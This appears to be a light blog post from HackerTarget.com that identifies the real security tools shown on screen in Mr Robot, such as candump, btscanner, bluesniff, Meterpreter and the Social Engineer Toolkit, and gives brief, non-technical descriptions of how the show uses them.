Car hacking has really hit the big time recently after computer security researchers remotely hacked into and took control of a Jeep as it was driving down the freeway. Canbus hacking has been around for a number of years and both car enthusiasts and security researchers have been poking around to gain access to the computers that control the modern car.

In the screen shot from Mr Robot we can see candump, one of the Linux utilities used for viewing the canbus messages.


USB in the car park

We see in this scene one of the few Windows desktops shown - during this scene a security guard inserts a USB drive found in the car park into his system infecting his Windows XP machine with malware. Leaving infected USB flash drives in the car park of the target organization is a well known trick to get code onto a system where network access is limited. In this instance the malware is caught by AVAST anti-virus.

Bluetooth Scanner (btscanner)

btscanner is used here to probe the targets' phones for Bluetooth capabilities. The tool attempts to extract as much information as possible from a Bluetooth device without having to pair with it. The btscanner program is included in the Kali Linux distribution, and we can see from the title bar of the window that Kali is the operating system being used here.

Bluesniff

In this screenshot bluesniff can be seen, another tool for attacking Bluetooth enabled devices. The actual plan here is to perform a man in the middle attack against the target's Bluetooth keyboard. With keyboard access the next move is to drop a Meterpreter shell onto the system for access to the target network.

Metasploit Framework (Meterpreter)

In this shot we can see a few lines from a Meterpreter shell. Anyone who has used this tool knows a little bit of Meterpreter goes a long way, so there was no need for an extensive shot of this powerful tool. Part of the Metasploit penetration testing framework from Rapid7, a Meterpreter shell gives an attacker full control of the compromised system as well as the ability to move around the network.


Social Engineer Toolkit (SET)

The Social Engineer Toolkit, or SET, is a framework that makes setting up social engineering attacks easier. Email based spear phishing attacks, fake websites and wireless access points can all be launched through its menu system. In this case they are using the SMS spoofing module.

Netscape Navigator the hackers browser of choice

Windows 95 and Netscape Navigator are mentioned when the lead character is thinking about his first steps as a hacker. In the screen shot you can see the page source being viewed... careful, if you see someone viewing the source they are no doubt a dangerous hacker. The humble web browser is actually a very useful tool for an attacker, whether they are launching web application attacks or researching LinkedIn for social engineering attacks.

There you go, a bit of fun for the end of the week. If you are after more information on any of the tools, explore the included links or try searching. The great thing about all these open source tools is that there are lots of tutorials and documentation available.

It is refreshing to see a television show making an effort not only to highlight the capabilities of current hacking techniques but also to stay reasonably close to reality.

The post Exploring the Hacker Tools of Mr Robot appeared first on HackerTarget.com.
